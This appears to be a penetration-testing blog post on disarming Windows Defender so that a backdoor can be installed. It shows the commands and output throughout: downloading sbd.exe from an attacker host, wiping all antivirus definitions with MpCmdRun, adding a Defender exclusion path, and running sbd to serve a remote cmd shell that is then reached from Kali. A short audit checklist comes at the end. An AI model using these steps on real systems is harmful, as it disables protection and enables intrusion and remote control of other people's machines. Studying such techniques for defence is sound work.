Disarm Windows Defender

When we try to download a backdoor program Windows Defender will block the file.

Invoke-WebRequest -uri "http://192.168.1.17/sbd.exe" -OutFile ".\sbd.exe"

malwaredetected

View Windows Defender Threats by using the Defender Powershell Module:

Get-MpThreat
 
 
CategoryID       : 8
DidThreatExecute : True
IsActive         : False
Resources        : {file:_C:\Users\Mambo Yoyo\clone.exe, file:_C:\Users\Mambo Yoyo\sbd.exe,
                   process:_pid:6560,ProcessStart:130877310747205268,
                   process:_pid:6752,ProcessStart:130876708785643534}
RollupStatus     : 97
SchemaVersion    : 1.0.0.0
SeverityID       : 4
ThreatID         : 2147626070
ThreatName       : Trojan:Win32/Trafog!rts
TypeID           : 0
PSComputerName   :

Most antivirus software runs as a protected service so we can’t stop or disable it:

net stop windefend
System error 5 has occurred.
 
Access is denied.
sc stop windefend
[SC] OpenService FAILED 5:
 
Access is denied.

Even if we try this as ‘system’ we get an access denied:

 .\psexec.exe -s cmd
 
PsExec v2.11 - Execute processes remotely
Copyright (C) 2001-2014 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32>whoami
nt authority\system
 
C:\Windows\system32>net stop windefend
System error 5 has occurred.
 
Access is denied.

In the GUI these functions are also not available.

defender_service

One way to get our backdoor on the system is by removing all virus definitions by using the mpcmdrun command line utility.

PS C:\Program Files\Windows Defender> .\MpCmdRun.exe -removedefinitions -all
 
Service Version: 4.8.207.0
Engine Version: 1.1.12101.0
AntiSpyware Signature Version: 1.207.1041.0
AntiVirus Signature Version: 1.207.1041.0
NIS Engine Version: 2.1.11804.0
NIS Signature Version: 115.22.0.0
 
Starting engine and signature rollback to none...
Done!

Now that we removed all definitions we can download our backdoor program.

Invoke-WebRequest -uri "http://192.168.1.17/sbd.exe" -OutFile ".\sbd.exe"
PS C:\Users\Mambo Yoyo> dir .\sbd.exe
 
 
    Directory: C:\Users\Mambo Yoyo
 
 
Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         9/26/2015  10:44 AM      50176 sbd.exe

And we can also execute our backdoor!

.\sbd.exe -l -p 444 -r 5 -e cmd -c on

And connect to it…

root@kali:/var/www# sbd 192.168.1.8 444 -c on
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
 
C:\Users\Mambo Yoyo>ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Bluetooth Network Connection:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::d876:531d:e07c:f20%3
   IPv4 Address. . . . . . . . . . . : 192.168.1.8
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.1

When we update our Windows Defender Signatures, our backdoor will be detected and removed.

C:\Program Files\Windows Defender> .\MpCmdRun.exe -signatureupdate
Signature update started . . .
Signature update finished.

Instead of removing the definitions we can also add an exclusionpath:

C:\users\Mambo Yoyo> Set-MpPreference -ExclusionPath "C:\Users\Mambo Yoyo"

From a defence/audit perspective we have to verify that:

  • Anti virus/malware software is installed
  • Anti virus/malware software is running
  • Anti virus/malware software is up-to-date
  • Anti virus/malware exclusions/exceptions are reviewed
  • Anti virus/malware events are send to a central log point
  • Anti virus/malware events are monitored, analysed and actions must be taken